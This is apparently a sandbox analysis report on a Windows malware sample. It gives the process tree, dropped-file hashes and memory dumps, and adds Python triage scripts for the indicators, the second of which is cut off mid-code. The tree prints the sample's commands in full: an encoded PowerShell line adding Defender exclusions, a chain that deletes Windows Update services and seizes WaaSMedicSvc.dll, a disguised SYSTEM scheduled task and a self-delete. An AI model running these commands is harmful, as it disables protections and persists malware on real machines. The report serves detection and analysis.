  cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcAB3AHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAHQAbQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBvAHYAYwBtACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAdgBsAHUAIwA+AA=="
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- [depth 3] C:\Windows\System32\cmd.exe
  cmdline: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
  - Suspicious use of WriteProcessMemory
- [depth 4] C:\Windows\system32\sc.exe
  cmdline: sc stop UsoSvc
  - Launches sc.exe
- [depth 4] C:\Windows\system32\sc.exe
  cmdline: sc stop WaaSMedicSvc
  - Launches sc.exe
- [depth 4] C:\Windows\system32\sc.exe
  cmdline: sc stop wuauserv
  - Launches sc.exe
- [depth 4] C:\Windows\system32\sc.exe
  cmdline: sc stop bits
  - Launches sc.exe
- [depth 4] C:\Windows\system32\sc.exe
  cmdline: sc stop dosvc
  - Launches sc.exe
- [depth 4] C:\Windows\system32\reg.exe
  cmdline: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
  - Modifies registry key
- [depth 4] C:\Windows\system32\reg.exe
  cmdline: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
  - Modifies registry key
- [depth 4] C:\Windows\system32\reg.exe
  cmdline: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
  - Modifies security service
  - Modifies registry key
- [depth 4] C:\Windows\system32\reg.exe
  cmdline: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
  - Modifies registry key
- [depth 4] C:\Windows\system32\reg.exe
  cmdline: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
  - Modifies registry key
- [depth 4] C:\Windows\system32\takeown.exe
  cmdline: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
  - Possible privilege escalation attempt
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
- [depth 4] C:\Windows\system32\icacls.exe
  cmdline: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
  - Possible privilege escalation attempt
  - Modifies file permissions
- [depth 4] C:\Windows\system32\reg.exe
  cmdline: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
  - Modifies registry key
- [depth 4] C:\Windows\system32\reg.exe
  cmdline: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
  - Modifies registry key
- [depth 4] C:\Windows\system32\reg.exe
  cmdline: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
  - Modifies registry key
- [depth 4] C:\Windows\system32\reg.exe
  cmdline: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
  - Modifies registry key
- [depth 4] C:\Windows\system32\schtasks.exe
  cmdline: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
- [depth 4] C:\Windows\system32\schtasks.exe
  cmdline: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
- [depth 4] C:\Windows\system32\schtasks.exe
  cmdline: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
- [depth 4] C:\Windows\system32\schtasks.exe
  cmdline: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
- [depth 4] C:\Windows\system32\schtasks.exe
  cmdline: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
- [depth 4] C:\Windows\system32\schtasks.exe
  cmdline: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
- [depth 4] C:\Windows\system32\schtasks.exe
  cmdline: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
- [depth 3] C:\Windows\System32\cmd.exe
  cmdline: "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  - Suspicious use of WriteProcessMemory
- [depth 4] C:\Windows\system32\powercfg.exe
  cmdline: powercfg /x -hibernate-timeout-ac 0
  - Suspicious use of AdjustPrivilegeToken
- [depth 4] C:\Windows\system32\powercfg.exe
  cmdline: powercfg /x -hibernate-timeout-dc 0
  - Suspicious use of AdjustPrivilegeToken
- [depth 4] C:\Windows\system32\powercfg.exe
  cmdline: powercfg /x -standby-timeout-ac 0
  - Suspicious use of AdjustPrivilegeToken
- [depth 4] C:\Windows\system32\powercfg.exe
  cmdline: powercfg /x -standby-timeout-dc 0
  - Suspicious use of AdjustPrivilegeToken
- [depth 3] C:\Windows\System32\conhost.exe
  cmdline: C:\Windows\System32\conhost.exe
  - Drops file in Windows directory
- [depth 3] C:\Windows\System32\cmd.exe
  cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "Microsoft Edge Update " /tr "\"C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe\""
- [depth 4] C:\Windows\system32\schtasks.exe
  cmdline: schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "Microsoft Edge Update " /tr "\"C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe\""
  - Creates scheduled task(s)
- [depth 3] C:\Windows\System32\cmd.exe
  cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "Microsoft Edge Update "
- [depth 4] C:\Windows\system32\schtasks.exe
  cmdline: schtasks /run /tn "Microsoft Edge Update "
- [depth 3] C:\Windows\System32\cmd.exe
  cmdline: "C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
  - Deletes itself
- [depth 4] C:\Windows\system32\choice.exe
  cmdline: choice /C Y /N /D Y /T 3
- [depth 1] C:\Windows\system32\lsm.exe
  cmdline: C:\Windows\system32\lsm.exe
- [depth 1] C:\Windows\system32\conhost.exe
  cmdline: \??\C:\Windows\system32\conhost.exe "-16722080571535217169-1709542500797918760-12076781451520547095-1779057725-1623862751"
- [depth 1] C:\Windows\system32\conhost.exe
  cmdline: \??\C:\Windows\system32\conhost.exe "73951558960456821916771466051598096447-11099653921517918713434235951165182873"
- [depth 1] C:\Windows\system32\conhost.exe
  cmdline: \??\C:\Windows\system32\conhost.exe "2009859479288353930655199290-1131329329-1466946350-2058103679-1568932160-964576090"
- [depth 1] C:\Windows\system32\conhost.exe
  cmdline: \??\C:\Windows\system32\conhost.exe "3642886732841802791347033148-5762311441526193446-4978928431630435496-1364049561"
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe
  Filesize: 4.9MB
  MD5: 619c8566b61a49d28d25590a16611849
  SHA1: d6c75e985d9ae6ff79b29bf39cac1d7514e7a473
  SHA256: aa0a1f379ba188db1bec2c91b483e9b628ddc319da17876cc0bab9d75b756cd2
  SHA512: a367b2188076923c050879685196dcbbe036dd317e0c976a45999008938fe15621ed69691e9817965df0957abe1a00017ddbe6fa0b0d83a6c5b66ca08de63363
-
C:\Windows\Tasks\dialersvc32.jobFilesize
1KB
MD5de247aaaeae861766c4fe157f263aead
SHA1b224133859b8c57eb3ac439e35242dfba6af20cd
SHA2567d832279f047a2c8a78d6b43a5c75812bbf5bfe2dd39b6036859bd955cdefdbd
SHA5122d0b484c62495b059bfba45bd00450546fa21e08758c7dd354c0a10b01bf1c046fa5f59f13dcc09ae1545122bc17596737ca02991a772a6f2fd8ebc31a50d301
-
C:\Windows\Tasks\dialersvc64.jobFilesize
1KB
MD5abbd0191a24bc43b59af8f4d68925168
SHA1fc003822bb3d537bc54b4c64d01131c8a9180bfd
SHA256225c5b1e38324bbd6e73c5828b04a5746f4c5b94ecccf9c8e9c1ab3eb8edc248
SHA51277d6e7d4c131958f1b6e6a9382a497a3e49e7f262a345511a8c5b62f0c3baef374c7e8f5a3ebbda57b3b7996b0d87f323442117b09d21600f394bfda399e5067
-
C:\Windows\system32\drivers\etc\hostsFilesize
3KB
MD5e546b81f1a1a1b753a4f6d3455394dec
SHA114f407db119dd97ed248be2a8d15a09ba938987a
SHA2561100d55448340b1a23c243209beb3aa1035a45912c346c00afb41181d9798de8
SHA51203f12755ae8c165323b2562b620731217b9f55affe782e6e07540131065b2edf5c465b5440d6b08c7a1a3d8541e423e8c9919ca768f72f830bc211bceb7fccfe
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exeFilesize
4.9MB
MD5619c8566b61a49d28d25590a16611849
SHA1d6c75e985d9ae6ff79b29bf39cac1d7514e7a473
SHA256aa0a1f379ba188db1bec2c91b483e9b628ddc319da17876cc0bab9d75b756cd2
SHA512a367b2188076923c050879685196dcbbe036dd317e0c976a45999008938fe15621ed69691e9817965df0957abe1a00017ddbe6fa0b0d83a6c5b66ca08de63363
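The process tree (a schtasks /run against a task name that ends in a space, and the choice-then-Del self-delete) and the dropped files listed above are the indicators an analyst would carry to other hosts. The script below is an added example, not part of this report and not the sample's own code: it re-implements those checks offline against constructed inputs. The task name, command lines, .job file names and hashes are the report's; the schtasks CSV text, hosts text, directory listing and byte strings are constructed test data, and on a real host they would come from `schtasks /query /fo csv /v`, the hosts file and a listing of C:\Windows\Tasks.

```python
"""Offline triage checks for the artifacts this report records.

Added example, not part of the sandbox report or of the sample's own code.
Only the hashes, task name, .job names and command lines come from the
report; SAMPLE_CSV, SAMPLE_HOSTS and SAMPLE_CMDLINES are constructed.
"""
import csv
import hashlib
import io
import re

DROPPED_SHA256 = "aa0a1f379ba188db1bec2c91b483e9b628ddc319da17876cc0bab9d75b756cd2"
JOB_FILES = {"dialersvc32.job", "dialersvc64.job"}        # C:\Windows\Tasks\*.job

# "Microsoft Edge Update " with trailing whitespace, as the report shows it;
# schtasks CSV output prefixes the name with a backslash.
TRAILING_SPACE_TASK = re.compile(r'^\\?Microsoft Edge Update\s+$')
# schtasks /run /tn "<name that ends in whitespace>"
SCHTASKS_RUN = re.compile(r'schtasks\s+/run\s+/tn\s+"([^"]*?\s)"', re.I)
# choice/timeout/ping delay chained into del: the self-delete idiom in the tree.
SELF_DELETE = re.compile(r'\b(choice|timeout|ping)\b[^&|]*[&|]+\s*del\s', re.I)

def digests(data):
    """MD5/SHA-1/SHA-256 of a byte string, keyed like the report's entries."""
    return {"md5": hashlib.md5(data).hexdigest(),
            "sha1": hashlib.sha1(data).hexdigest(),
            "sha256": hashlib.sha256(data).hexdigest()}

EMPTY_DIGESTS = digests(b"")   # d41d8cd9... / da39a3ee... / e3b0c442...

def entry_is_empty(entry):
    """True when a report entry carries the digests of zero bytes, as the
    \\??\\PIPE\\srvsvc entry does: the object was opened, nothing captured."""
    return {k: entry[k].lower() for k in EMPTY_DIGESTS} == EMPTY_DIGESTS

def matches_dropped_file(data):
    """True when a file pulled from a host is byte-identical to the dropped
    MicrosoftEdgeUpdate.exe (and therefore to the submitted sample)."""
    return digests(data)["sha256"] == DROPPED_SHA256

def trailing_space_tasks(schtasks_csv):
    """Task names from `schtasks /query /fo csv /v` output that are
    'Microsoft Edge Update' padded with whitespace.  An exact-name lookup
    (`schtasks /query /tn "Microsoft Edge Update"`) misses such a task."""
    rows = csv.DictReader(io.StringIO(schtasks_csv))
    return [r["TaskName"] for r in rows if TRAILING_SPACE_TASK.match(r["TaskName"])]

def classify_cmdline(cmdline):
    """Label the two command-line patterns the process tree shows."""
    tags = []
    if SCHTASKS_RUN.search(cmdline):
        tags.append("schtasks-run-trailing-space")
    if SELF_DELETE.search(cmdline):
        tags.append("delay-then-self-delete")
    return tags

def hosts_overrides(hosts_text):
    """(hostname, ip) pairs a hosts file maps, comments and blanks skipped.
    Sinkholed update/AV domains show up as entries pointing at 127.0.0.1
    or 0.0.0.0."""
    out = []
    for raw in hosts_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        out.extend((n.lower(), ip) for n in names)
    return out

def job_files_present(names):
    """Which of the two legacy .job names from the report appear in a
    listing of C:\\Windows\\Tasks (names only, so a dir dump is enough)."""
    return sorted(JOB_FILES & {n.lower() for n in names})

# Constructed inputs (not from the report) so the checks run offline.
SAMPLE_CSV = (
    '"HostName","TaskName","Next Run Time","Status"\r\n'
    '"WIN7","\\Microsoft Edge Update ","N/A","Ready"\r\n'
    '"WIN7","\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","N/A","Ready"\r\n'
)
SAMPLE_HOSTS = (
    "# Copyright (c) 1993-2009 Microsoft Corp.\n"
    "#\t127.0.0.1       localhost\n"
    "0.0.0.0 update.example.invalid   # constructed entry\n"
    "127.0.0.1 telemetry.example.invalid\n"
)
SAMPLE_CMDLINES = [
    '"C:\\Windows\\System32\\cmd.exe" /c schtasks /run /tn "Microsoft Edge Update "',
    '"C:\\Windows\\System32\\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del '
    '"C:\\Users\\Admin\\AppData\\Local\\Temp\\tmp.exe"',
    'C:\\Windows\\system32\\conhost.exe',
]

if __name__ == "__main__":
    print(trailing_space_tasks(SAMPLE_CSV))
    for c in SAMPLE_CMDLINES:
        print(classify_cmdline(c), c[:60])
    print(hosts_overrides(SAMPLE_HOSTS))
    print(job_files_present(["DIALERSVC32.JOB", "SA.DAT", "dialersvc64.job"]))
```

The hash check is deliberately on the dropped file's SHA-256 rather than on the path: the sample writes itself under a benign-looking Edge updater name, so a path match alone would also flag a legitimate installation directory, while a digest match is unambiguous.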
- memory/108-421-0x0000000000000000-mapping.dmp
- memory/112-117-0x0000000000000000-mapping.dmp
- memory/272-246-0x0000000001160000-0x000000000118A000-memory.dmp (Filesize 168KB)
- memory/316-371-0x0000000000000000-mapping.dmp
- memory/316-467-0x0000000000000000-mapping.dmp
- memory/336-92-0x0000000000000000-mapping.dmp
- memory/416-156-0x0000000000860000-0x000000000088A000-memory.dmp (Filesize 168KB)
- memory/416-149-0x0000000037850000-0x0000000037860000-memory.dmp (Filesize 64KB)
- memory/416-145-0x0000000000720000-0x0000000000743000-memory.dmp (Filesize 140KB)
- memory/416-148-0x000007FEBDC30000-0x000007FEBDC40000-memory.dmp (Filesize 64KB)
- memory/416-303-0x0000000000860000-0x000000000088A000-memory.dmp (Filesize 168KB)
- memory/416-153-0x0000000000720000-0x0000000000743000-memory.dmp (Filesize 140KB)
- memory/460-163-0x0000000000210000-0x000000000023A000-memory.dmp (Filesize 168KB)
- memory/460-155-0x0000000037850000-0x0000000037860000-memory.dmp (Filesize 64KB)
- memory/460-152-0x000007FEBDC30000-0x000007FEBDC40000-memory.dmp (Filesize 64KB)
- memory/476-304-0x0000000000170000-0x000000000019A000-memory.dmp (Filesize 168KB)
- memory/476-158-0x000007FEBDC30000-0x000007FEBDC40000-memory.dmp (Filesize 64KB)
- memory/476-160-0x0000000037850000-0x0000000037860000-memory.dmp (Filesize 64KB)
- memory/476-165-0x0000000000170000-0x000000000019A000-memory.dmp (Filesize 168KB)
- memory/484-166-0x000007FEBDC30000-0x000007FEBDC40000-memory.dmp (Filesize 64KB)
- memory/484-168-0x00000000003B0000-0x00000000003DA000-memory.dmp (Filesize 168KB)
- memory/484-171-0x0000000037850000-0x0000000037860000-memory.dmp (Filesize 64KB)
- memory/544-346-0x0000000000000000-mapping.dmp
- memory/572-101-0x0000000140000000-0x0000000140056000-memory.dmp (Filesize 344KB)
- memory/572-110-0x0000000140000000-0x0000000140056000-memory.dmp (Filesize 344KB)
- memory/572-114-0x0000000140000000-0x0000000140056000-memory.dmp (Filesize 344KB)
- memory/572-107-0x0000000140000000-0x0000000140056000-memory.dmp (Filesize 344KB)
- memory/572-108-0x0000000140001844-mapping.dmp
- memory/572-106-0x0000000140000000-0x0000000140056000-memory.dmp (Filesize 344KB)
- memory/572-104-0x0000000140000000-0x0000000140056000-memory.dmp (Filesize 344KB)
- memory/572-103-0x0000000140000000-0x0000000140056000-memory.dmp (Filesize 344KB)
- memory/572-102-0x0000000140000000-0x0000000140056000-memory.dmp (Filesize 344KB)
- memory/572-96-0x0000000140000000-0x0000000140056000-memory.dmp (Filesize 344KB)
- memory/572-97-0x0000000140000000-0x0000000140056000-memory.dmp (Filesize 344KB)
- memory/572-99-0x0000000140000000-0x0000000140056000-memory.dmp (Filesize 344KB)
- memory/580-514-0x0000000000000000-mapping.dmp
- memory/588-172-0x000007FEBDC30000-0x000007FEBDC40000-memory.dmp (Filesize 64KB)
- memory/588-174-0x0000000000490000-0x00000000004BA000-memory.dmp (Filesize 168KB)
- memory/588-173-0x0000000037850000-0x0000000037860000-memory.dmp (Filesize 64KB)
- memory/604-255-0x0000000037850000-0x0000000037860000-memory.dmp (Filesize 64KB)
- memory/604-254-0x0000000001DA0000-0x0000000001DCA000-memory.dmp (Filesize 168KB)
- memory/624-75-0x0000000000000000-mapping.dmp
- memory/664-244-0x0000000000490000-0x00000000004BA000-memory.dmp (Filesize 168KB)
- memory/736-413-0x0000000000000000-mapping.dmp
- memory/744-397-0x0000000000000000-mapping.dmp
- memory/748-181-0x000007FEBDC30000-0x000007FEBDC40000-memory.dmp (Filesize 64KB)
- memory/748-183-0x0000000037850000-0x0000000037860000-memory.dmp (Filesize 64KB)
- memory/748-245-0x0000000000BB0000-0x0000000000BDA000-memory.dmp (Filesize 168KB)
- memory/796-247-0x00000000008F0000-0x000000000091A000-memory.dmp (Filesize 168KB)
- memory/796-248-0x0000000037850000-0x0000000037860000-memory.dmp (Filesize 64KB)
- memory/808-414-0x0000000000000000-mapping.dmp
- memory/812-118-0x0000000000000000-mapping.dmp
- memory/832-70-0x0000000000000000-mapping.dmp
- memory/836-249-0x00000000009C0000-0x00000000009EA000-memory.dmp (Filesize 168KB)
- memory/836-250-0x0000000037850000-0x0000000037860000-memory.dmp (Filesize 64KB)
- memory/852-277-0x0000000000180000-0x00000000001A1000-memory.dmp (Filesize 132KB)
- memory/852-112-0x0000000000000000-mapping.dmp
- memory/852-278-0x00000000779F0000-0x0000000077B70000-memory.dmp (Filesize 1.5MB)
- memory/852-73-0x0000000000000000-mapping.dmp
- memory/852-276-0x00000000000E0000-0x00000000000FB000-memory.dmp (Filesize 108KB)
- memory/856-68-0x0000000000000000-mapping.dmp
- memory/868-252-0x0000000037850000-0x0000000037860000-memory.dmp (Filesize 64KB)
- memory/868-251-0x0000000000910000-0x000000000093A000-memory.dmp (Filesize 168KB)
- memory/900-431-0x0000000000000000-mapping.dmp
- memory/920-69-0x0000000000000000-mapping.dmp
- memory/944-368-0x0000000000000000-mapping.dmp
- memory/944-91-0x0000000000000000-mapping.dmp
- memory/956-483-0x0000000000000000-mapping.dmp
- memory/1008-82-0x0000000000000000-mapping.dmp
- memory/1020-67-0x0000000000000000-mapping.dmp
- memory/1060-253-0x00000000007B0000-0x00000000007DA000-memory.dmp (Filesize 168KB)
- memory/1076-135-0x0000000140000000-0x0000000140042000-memory.dmp (Filesize 264KB)
- memory/1076-159-0x0000000140000000-0x0000000140042000-memory.dmp (Filesize 264KB)
- memory/1076-305-0x0000000077810000-0x00000000779B9000-memory.dmp (Filesize 1.7MB)
- memory/1076-141-0x00000000776F0000-0x000000007780F000-memory.dmp (Filesize 1.1MB)
- memory/1076-161-0x0000000077810000-0x00000000779B9000-memory.dmp (Filesize 1.7MB)
- memory/1076-269-0x0000000000ED0000-0x0000000000EFA000-memory.dmp (Filesize 168KB)
- memory/1076-139-0x0000000077810000-0x00000000779B9000-memory.dmp (Filesize 1.7MB)
- memory/1076-136-0x00000001400033F4-mapping.dmp
- memory/1076-138-0x0000000140000000-0x0000000140042000-memory.dmp (Filesize 264KB)
- memory/1080-120-0x0000000000000000-mapping.dmp
- memory/1080-365-0x0000000000000000-mapping.dmp
- memory/1088-261-0x0000000037850000-0x0000000037860000-memory.dmp (Filesize 64KB)
- memory/1088-260-0x0000000000850000-0x000000000087A000-memory.dmp (Filesize 168KB)
- memory/1120-256-0x0000000001F50000-0x0000000001F7A000-memory.dmp (Filesize 168KB)
- memory/1176-129-0x0000000000340000-0x0000000000CC4000-memory.dmp (Filesize 9.5MB)
- memory/1176-124-0x0000000000000000-mapping.dmp
- memory/1176-268-0x0000000001150000-0x000000000117A000-memory.dmp (Filesize 168KB)
- memory/1184-76-0x0000000000000000-mapping.dmp
- memory/1192-257-0x0000000001E10000-0x0000000001E3A000-memory.dmp (Filesize 168KB)
- memory/1208-332-0x0000000000000000-mapping.dmp
- memory/1224-301-0x0000000000A70000-0x0000000000A9A000-memory.dmp (Filesize 168KB)
- memory/1224-302-0x00000000012EB000-0x000000000130A000-memory.dmp (Filesize 124KB)
- memory/1224-298-0x0000000000A70000-0x0000000000A9A000-memory.dmp (Filesize 168KB)
- memory/1224-299-0x00000000012EB000-0x000000000130A000-memory.dmp (Filesize 124KB)
- memory/1224-300-0x00000000012E4000-0x00000000012E7000-memory.dmp (Filesize 12KB)
- memory/1224-294-0x0000000000130000-0x000000000015A000-memory.dmp (Filesize 168KB)
- memory/1224-284-0x0000000000000000-mapping.dmp
- memory/1224-295-0x00000000012E4000-0x00000000012E7000-memory.dmp (Filesize 12KB)
- memory/1244-61-0x000007FEEDDE0000-0x000007FEEE803000-memory.dmp (Filesize 10.1MB)
- memory/1244-62-0x000007FEED280000-0x000007FEEDDDD000-memory.dmp (Filesize 11.4MB)
- memory/1244-59-0x0000000000000000-mapping.dmp
- memory/1244-63-0x00000000026A4000-0x00000000026A7000-memory.dmp (Filesize 12KB)
- memory/1244-64-0x00000000026A4000-0x00000000026A7000-memory.dmp (Filesize 12KB)
- memory/1244-65-0x00000000026AB000-0x00000000026CA000-memory.dmp (Filesize 124KB)
- memory/1284-259-0x0000000037850000-0x0000000037860000-memory.dmp (Filesize 64KB)
- memory/1284-258-0x0000000002A70000-0x0000000002A9A000-memory.dmp (Filesize 168KB)
- memory/1292-88-0x0000000000000000-mapping.dmp
- memory/1344-113-0x0000000000000000-mapping.dmp
- memory/1352-54-0x0000000001030000-0x00000000019B4000-memory.dmp (Filesize 9.5MB)
- memory/1352-95-0x00000000005F0000-0x00000000005F6000-memory.dmp (Filesize 24KB)
- memory/1352-57-0x000000001C200000-0x000000001C660000-memory.dmp (Filesize 4.4MB)
- memory/1352-58-0x000007FEFC091000-0x000007FEFC093000-memory.dmp (Filesize 8KB)
- memory/1360-443-0x0000000000000000-mapping.dmp
- memory/1412-80-0x0000000000000000-mapping.dmp
- memory/1444-72-0x0000000000000000-mapping.dmp
- memory/1492-66-0x0000000000000000-mapping.dmp
- memory/1496-452-0x0000000000000000-mapping.dmp
- memory/1508-93-0x0000000000000000-mapping.dmp
- memory/1516-85-0x0000000000000000-mapping.dmp
- memory/1532-270-0x0000000000370000-0x000000000039A000-memory.dmp (Filesize 168KB)
- memory/1544-86-0x0000000000000000-mapping.dmp
- memory/1576-339-0x0000000000000000-mapping.dmp
- memory/1608-84-0x0000000000000000-mapping.dmp
- memory/1616-267-0x0000000037850000-0x0000000037860000-memory.dmp (Filesize 64KB)
- memory/1616-266-0x0000000000760000-0x000000000078A000-memory.dmp (Filesize 168KB)
- memory/1628-89-0x0000000000000000-mapping.dmp
- memory/1632-263-0x0000000037850000-0x0000000037860000-memory.dmp (Filesize 64KB)
- memory/1632-262-0x0000000000920000-0x000000000094A000-memory.dmp (Filesize 168KB)
- memory/1640-74-0x0000000000000000-mapping.dmp
- memory/1644-71-0x0000000000000000-mapping.dmp
- memory/1676-507-0x0000000000000000-mapping.dmp
- memory/1680-116-0x0000000000000000-mapping.dmp
- memory/1680-78-0x0000000000000000-mapping.dmp
- memory/1712-79-0x0000000000000000-mapping.dmp
- memory/1748-83-0x0000000000000000-mapping.dmp
- memory/1776-473-0x0000000000000000-mapping.dmp
- memory/1788-399-0x0000000000000000-mapping.dmp
- memory/1816-90-0x0000000000000000-mapping.dmp
- memory/1820-94-0x0000000000000000-mapping.dmp
- memory/1976-297-0x0000000037850000-0x0000000037860000-memory.dmp (Filesize 64KB)
- memory/1976-296-0x0000000000140000-0x000000000016A000-memory.dmp (Filesize 168KB)
- memory/1984-81-0x0000000000000000-mapping.dmp
- memory/2000-142-0x0000000000EBB000-0x0000000000EDA000-memory.dmp (Filesize 124KB)
- memory/2000-143-0x0000000077810000-0x00000000779B9000-memory.dmp (Filesize 1.7MB)
- memory/2000-140-0x0000000000EB4000-0x0000000000EB7000-memory.dmp (Filesize 12KB)
- memory/2000-144-0x00000000776F0000-0x000000007780F000-memory.dmp (Filesize 1.1MB)
- memory/2000-134-0x00000000776F0000-0x000000007780F000-memory.dmp (Filesize 1.1MB)
- memory/2000-495-0x0000000000000000-mapping.dmp
- memory/2000-133-0x0000000077810000-0x00000000779B9000-memory.dmp (Filesize 1.7MB)
- memory/2000-119-0x0000000000000000-mapping.dmp
- memory/2000-127-0x000007FEF3B50000-0x000007FEF46AD000-memory.dmp (Filesize 11.4MB)
- memory/2000-130-0x0000000000EB4000-0x0000000000EB7000-memory.dmp (Filesize 12KB)
- memory/2000-126-0x000007FEF46B0000-0x000007FEF50D3000-memory.dmp (Filesize 10.1MB)
- memory/2000-458-0x0000000000000000-mapping.dmp
- memory/2004-77-0x0000000000000000-mapping.dmp
- memory/2004-115-0x0000000000000000-mapping.dmp
- memory/2012-264-0x00000000007B0000-0x00000000007DA000-memory.dmp (Filesize 168KB)
- memory/2012-265-0x0000000037850000-0x0000000037860000-memory.dmp (Filesize 64KB)
- memory/2016-87-0x0000000000000000-mapping.dmp
- memory/2016-347-0x0000000000000000-mapping.dmp
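Two patterns in the dump listing above are worth pulling out before opening any dump: a 168KB region and a 64KB region at 0x37850000 recur in many unrelated PIDs (416, 460, 476, 484, 588, 604, 748, 796, 836, 868, 1088, 1284, 1616, 1632, 1976, 2012 and others), and PIDs 572 and 1076 each have a region starting at 0x140000000 with a mapping dump at a small offset into it (0x1844 and 0x33F4). The script below is an added example, not part of this report: it parses the dump names and surfaces both patterns, working on a subset of the names copied from the report. It only groups names and sizes; what the regions contain has to come from the dumps themselves.

```python
"""Group the memory dumps this report lists by region size, and resolve
each mapping dump to the region of the same PID that contains it.

Added example, not part of the sandbox report.  Dump names follow
memory/<pid>-<n>-0x<start>-0x<end>-memory.dmp or
memory/<pid>-<n>-0x<addr>-mapping.dmp.  SAMPLE_NAMES is a subset copied
from the report so the code runs offline.
"""
import re
from collections import defaultdict

DUMP_RE = re.compile(
    r"memory/(?P<pid>\d+)-(?P<n>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
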